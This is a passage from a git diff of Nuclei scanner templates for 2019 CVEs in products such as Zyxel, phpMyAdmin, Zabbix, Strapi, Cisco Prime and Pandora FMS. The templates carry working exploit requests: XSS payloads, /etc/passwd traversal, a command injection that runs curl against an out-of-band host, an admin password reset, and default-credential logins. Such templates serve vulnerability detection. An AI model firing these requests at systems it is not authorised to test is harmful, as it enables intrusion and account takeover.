== 200 - contains(body_2, 'value=\"\">\">') condition: and - -# Enhanced by mp on 2022/08/08 +# digest: 4a0a0047304502206211cfa838795769776a00d7ccfcedaa1fe50255fc01e8f945c461b0d2ebc946022100f37746cb8f51e8f7d78c8730d26614a8b2ffc9a7d999c013d5b875cf3568d608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12461.yaml b/nuclei-templates/CVE-2019/cve-2019-12461.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-12461.yaml rename to nuclei-templates/CVE-2019/cve-2019-12461.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-12581.yaml b/nuclei-templates/CVE-2019/cve-2019-12581.yaml new file mode 100644 index 0000000000..327f88b08f --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12581.yaml @@ -0,0 +1,55 @@ +id: CVE-2019-12581 + +info: + name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting + author: n-thumann + severity: medium + description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability. + reference: + - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml + - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ + - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 + - https://www.zyxel.com/us/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12581 + cwe-id: CWE-79 + epss-score: 0.00642 + epss-percentile: 0.7705 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: uag2100_firmware + shodan-query: http.title:"ZyWall" + tags: cve,cve2019,zyxel,zywall,xss + +http: + - method: GET + path: + - "{{BaseURL}}/free_time_failed.cgi?err_msg=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Please contact with administrator." + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402202bbcd24325d27b4afa9692a47676116c3e746dac9efb6781eca7200bedd46d5c02203e77b6aa27e9da81a381ac8a93047e7dfe379956ebf9a6b0196e58a7150cb1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-12583.yaml b/nuclei-templates/CVE-2019/cve-2019-12583.yaml index dea4b3429c..3f62ff75c8 100644 --- a/nuclei-templates/CVE-2019/cve-2019-12583.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-12583.yaml @@ -5,19 +5,31 @@ info: author: n-thumann,daffainfo severity: critical description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. + impact: | + An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the vulnerability. reference: - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - https://nvd.nist.gov/vuln/detail/CVE-2019-12583 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2019-12583 cwe-id: CWE-425 - tags: cve,cve2019,zyxel,zywall + epss-score: 0.00481 + epss-percentile: 0.75389 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: uag2100_firmware + tags: cve,cve2019,zyxel,zywall,xss - -requests: +http: - method: GET path: - "{{BaseURL}}/free_time.cgi" @@ -34,5 +46,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/06/01 +# digest: 4b0a00483046022100a12874f0ef2733bc8c7f0e764fb0ca6289dcb56f72499b238b27b09caf888bb8022100db48c204ba56cf97ad35c36b148a21decd86e83cd35614cb546190faea932e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-12616.yaml b/nuclei-templates/CVE-2019/cve-2019-12616.yaml new file mode 100644 index 0000000000..6d8e56152d --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12616.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-12616 + +info: + name: phpMyAdmin CSRF + author: Mohammedsaneem,philippedelteil + description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + severity: medium + tags: cve,cve2019,phpmyadmin,csrf + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-12616 + cwe-id: CWE-352 + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + + matchers-condition: and + matchers: + - type: word + words: + - "phpmyadmin.net" + - "phpMyAdmin" + condition: or + + - type: regex + regex: + - 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0 + + - type: status + status: + - 200 + - 401 # password protected diff --git a/nuclei-templates/CVE-2019/cve-2019-12962.yaml b/nuclei-templates/CVE-2019/cve-2019-12962.yaml new file mode 100644 index 0000000000..32221d9467 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12962.yaml @@ -0,0 +1,56 @@ +id: CVE-2019-12962 + +info: + name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting + author: Clment Cruchet + severity: medium + description: | + LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/49669 + - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ + - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + - https://github.com/anonymous364872/Rapier_Tool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 + epss-score: 0.17333 + epss-percentile: 0.95984 + cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: livezilla + product: livezilla + shodan-query: http.html:LiveZilla + tags: cve,cve2019,xss,edb,packetstorm,livezilla + +http: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + + headers: + Accept-Language: ';alert(document.domain)//' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450220730404803aefaab9552a359a9109e306f61b6f746b25c25c309b98bb2769cc44022100afd816ccce19408b01fe5861f8ea76986010736a6cdc3ffba50658a7a50a73d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-13392.yaml b/nuclei-templates/CVE-2019/cve-2019-13392.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-13392.yaml rename to nuclei-templates/CVE-2019/cve-2019-13392.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-13396.yaml b/nuclei-templates/CVE-2019/cve-2019-13396.yaml deleted file mode 100644 index baf97b5f61..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-13396.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2019-1336 - -info: - name: Weblogic RCE GET request - author: medbsq - severity: critical - # link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - - -requests: - - raw: - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Accept-Encoding: gzip, deflate - Content-Type: application/x-www-form-urlencoded - - callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login - - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Accept-Encoding: gzip, deflate - Content-Type: application/x-www-form-urlencoded - - callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd - - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:[x*]:0:0:" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-14251.yaml b/nuclei-templates/CVE-2019/cve-2019-14251.yaml deleted file mode 100644 index 721e75c0db..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-14251.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2019-14251 - -info: - name: T24 Web Server - Local File Inclusion - author: 0x_Akoko - severity: high - description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. - reference: - - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt - - https://vuldb.com/?id.146815 - - https://nvd.nist.gov/vuln/detail/CVE-2019-14251 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-14251 - cwe-id: CWE-22 - tags: cve,cve2019,temenos,lfi,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" - - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - "for 16-bit app support" - condition: or - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2019/CVE-2019-14470.yaml b/nuclei-templates/CVE-2019/cve-2019-14470.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14470.yaml rename to nuclei-templates/CVE-2019/cve-2019-14470.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-14974.yaml b/nuclei-templates/CVE-2019/cve-2019-14974.yaml new file mode 100644 index 0000000000..324308f363 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-14974.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-14974 + +info: + name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting + author: madrobot + severity: medium + tags: cve,cve2019,xss,sugarcrm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14974 + cwe-id: CWE-79 + description: "SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS." + reference: + - https://www.exploit-db.com/exploits/47247 + +requests: + - method: GET + path: + - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "url = window.location.search.split(\"?desktop_url=\")[1]" + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-15043.yaml b/nuclei-templates/CVE-2019/cve-2019-15043.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-15043.yaml rename to nuclei-templates/CVE-2019/cve-2019-15043.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml b/nuclei-templates/CVE-2019/cve-2019-15811.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-15811.yaml rename to nuclei-templates/CVE-2019/cve-2019-15811.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16332.yaml b/nuclei-templates/CVE-2019/cve-2019-16332.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16332.yaml rename to nuclei-templates/CVE-2019/cve-2019-16332.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16932.yaml b/nuclei-templates/CVE-2019/cve-2019-16932.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16932.yaml rename to nuclei-templates/CVE-2019/cve-2019-16932.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-17382.yaml b/nuclei-templates/CVE-2019/cve-2019-17382.yaml new file mode 100644 index 0000000000..8dfa5344ff --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17382.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-17382 + +info: + name: Zabbix Authentication Bypass + author: harshbothra_ + severity: critical + description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. + reference: https://www.exploit-db.com/exploits/47467 + tags: cve,cve2019,zabbix,fuzz,bypass,login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-17382 + cwe-id: CWE-639 + +requests: + - raw: + - | + GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en-US,en;q=0.9 + + payloads: + ids: helpers/wordlists/numbers.txt + + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "Dashboard" diff --git a/nuclei-templates/CVE-2019/cve-2019-17444.yaml b/nuclei-templates/CVE-2019/cve-2019-17444.yaml new file mode 100644 index 0000000000..b0a563e27c --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17444.yaml @@ -0,0 +1,56 @@ +id: CVE-2019-17444 + +info: + name: Jfrog Artifactory <6.17.0 - Default Admin Password + author: pdteam + severity: critical + description: | + Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. + impact: | + An attacker can gain unauthorized access to the Jfrog Artifactory instance. + remediation: | + Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one. + reference: + - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes + - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory + - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-17444 + cwe-id: CWE-521 + epss-score: 0.05344 + epss-percentile: 0.92917 + cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* + metadata: + max-request: 1 + vendor: jfrog + product: artifactory + framework: "-" + tags: cve,cve2019,jfrog,default-login,- + +http: + - raw: + - | + POST /ui/api/v1/ui/auth/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{RootURL}} + + {"user":"admin","password":"password","type":"login"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"name":"admin"' + - '"admin":true' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100defa8caef3bfc49d27462a363fbb840af42c8534de065f888f06b35299e8683f02204ecaa3467ff227bbd38b2b2cb2433ae54ea6ea587ec1ed3e9e30ef053c3ca6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-17558.yaml b/nuclei-templates/CVE-2019/cve-2019-17558.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-17558.yaml rename to nuclei-templates/CVE-2019/cve-2019-17558.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1821.yaml b/nuclei-templates/CVE-2019/cve-2019-1821.yaml new file mode 100644 index 0000000000..3c95729884 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-1821.yaml @@ -0,0 +1,51 @@ +id: CVE-2019-1821 + +info: + name: Cisco Prime Infrastructure Unauthorized RCE + author: _0xf4n9x_ + severity: critical + description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. + reference: + - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 + metadata: + shodan-query: 'http.title:"prime infrastructure"' + tags: cve,cve2019,rce,fileupload,unauth,intrusive,cisco + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-1821 + cwe-id: CWE-20 + +requests: + - raw: + - | + POST /servlet/UploadServlet HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Primary-IP: 127.0.0.1 + Filename: test.tar + Filesize: 10240 + Compressed-Archive: false + Destination-Dir: tftpRoot + Filecount: 1 + Content-Length: 269 + Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 + + --871a4a346a547cf05cb83f57b9ebcb83 + Content-Disposition: form-data; name="files"; filename="test.tar" + + ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} + --871a4a346a547cf05cb83f57b9ebcb83-- + + - | + GET /test.txt HTTP/1.1 + Host: {{Host}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains((body_2), '{{randstr}}')" + condition: and diff --git a/nuclei-templates/CVE-2019/cve-2019-18371.yaml b/nuclei-templates/CVE-2019/cve-2019-18371.yaml deleted file mode 100644 index 49dfb3776c..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-18371.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2019-18371 - -info: - name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion - author: ritikchaddha - severity: high - description: | - Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. - reference: - - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html - - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py - - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18371 - cwe-id: CWE-22 - tags: cve2019,cve,lfi,router,mi,xiaomi - -requests: - - method: GET - path: - - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/cve-2019-18665.yaml b/nuclei-templates/CVE-2019/cve-2019-18665.yaml deleted file mode 100644 index 0af194d419..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-18665.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-18665 - -info: - name: DOMOS 5.5 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. - reference: - - https://atomic111.github.io/article/secudos-domos-directory_traversal - - https://vuldb.com/?id.144804 - - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 - - https://nvd.nist.gov/vuln/detail/CVE-2019-18665 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18665 - cwe-id: CWE-22 - tags: cve,cve2019,domos,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/08 diff --git a/nuclei-templates/CVE-2019/cve-2019-18818.yaml b/nuclei-templates/CVE-2019/cve-2019-18818.yaml new file mode 100644 index 0000000000..597d2793e1 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-18818.yaml @@ -0,0 +1,52 @@ +id: CVE-2019-18818 + +info: + name: Strapi CMS - Admin password reset (Unauthenticated) + author: idealphase + description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + reference: + - https://github.com/advisories/GHSA-6xc2-mj39-q599 + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + severity: critical + tags: cve,cve2019,strapi,auth-bypass,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 + +requests: + - raw: + - | + POST /admin/auth/reset-password HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + condition: and + words: + - '"username":' + - '"email":' + - '"jwt":' + part: body + + extractors: + - type: json + json: + - .user.username + - .user.email \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-19134.yaml b/nuclei-templates/CVE-2019/cve-2019-19134.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-19134.yaml rename to nuclei-templates/CVE-2019/cve-2019-19134.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-19781.yaml b/nuclei-templates/CVE-2019/cve-2019-19781.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-19781.yaml rename to nuclei-templates/CVE-2019/cve-2019-19781.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-19908.yaml b/nuclei-templates/CVE-2019/cve-2019-19908.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-19908.yaml rename to nuclei-templates/CVE-2019/cve-2019-19908.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-20141.yaml b/nuclei-templates/CVE-2019/cve-2019-20141.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-20141.yaml rename to nuclei-templates/CVE-2019/cve-2019-20141.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-20210.yaml b/nuclei-templates/CVE-2019/cve-2019-20210.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-20210.yaml rename to nuclei-templates/CVE-2019/cve-2019-20210.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-20224.yaml b/nuclei-templates/CVE-2019/cve-2019-20224.yaml index 6cde65fe36..e6ded4687b 100644 --- a/nuclei-templates/CVE-2019/cve-2019-20224.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-20224.yaml @@ -6,20 +6,30 @@ info: severity: high description: | Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. + - https://pandorafms.com/downloads/solved-pandorafms-742.mp4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 - tags: pandorafms,rce,cve,cve2019,authenticated,oast - -requests: + epss-score: 0.18764 + epss-percentile: 0.95774 + cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: artica + product: pandora_fms + tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica + +http: - raw: - | POST /pandora_console/index.php?login=1 HTTP/1.1 @@ -27,7 +37,6 @@ requests: Content-Type: application/x-www-form-urlencoded nick=admin&pass=admin&login_button=Login - - | POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 Host: {{Hostname}} @@ -35,19 +44,18 @@ requests: date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - cookie-reuse: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word + name: "http" part: interactsh_protocol - name: http words: - "http" - type: status status: - 200 - -# Enhanced by mp on 2022/06/17 +# digest: 490a00463044022046ac7207d2f9331283e0b83f2ec5f492144749de02ae7a6eb328fc4c5c3d40270220014b1f4e41a4c8e7fb88abf43f8baf6f2673f8fd542c36dcc365a951f84516a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-20354.yaml b/nuclei-templates/CVE-2019/cve-2019-20354.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-20354.yaml rename to nuclei-templates/CVE-2019/cve-2019-20354.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-20933.yaml b/nuclei-templates/CVE-2019/cve-2019-20933.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-20933.yaml rename to nuclei-templates/CVE-2019/cve-2019-20933.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-3401.yaml b/nuclei-templates/CVE-2019/cve-2019-3401.yaml new file mode 100644 index 0000000000..a3d0348acc --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-3401.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-3401 + +info: + name: Atlassian JIRA Information Exposure (CVE-2019-3401) + author: TechbrunchFR,milo2012 + description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. + severity: medium + tags: cve,cve2019,jira,atlassian,exposure + reference: https://jira.atlassian.com/browse/JRASERVER-69244 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-3401 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" + matchers: + - type: word + words: + - '' + - 'Manage Filters - Jira' + condition: and + +# Remediation: +# Ensure that this permission is restricted to specific groups that require it. +# You can restrict it in Administration > System > Global Permissions. +# Turning the feature off will not affect existing filters and dashboards. +# If you change this setting, you will still need to update the existing filters and dashboards if they have already been +# shared publicly. +# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/nuclei-templates/CVE-2019/cve-2019-3402.yaml b/nuclei-templates/CVE-2019/cve-2019-3402.yaml deleted file mode 100644 index 00cde456b9..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-3402.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: cve-2019-3402 -info: - name: Jira - Reflected XSS using searchOwnerUserName parameter. - author: pdteam - severity: medium - description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter. - reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c - tags: 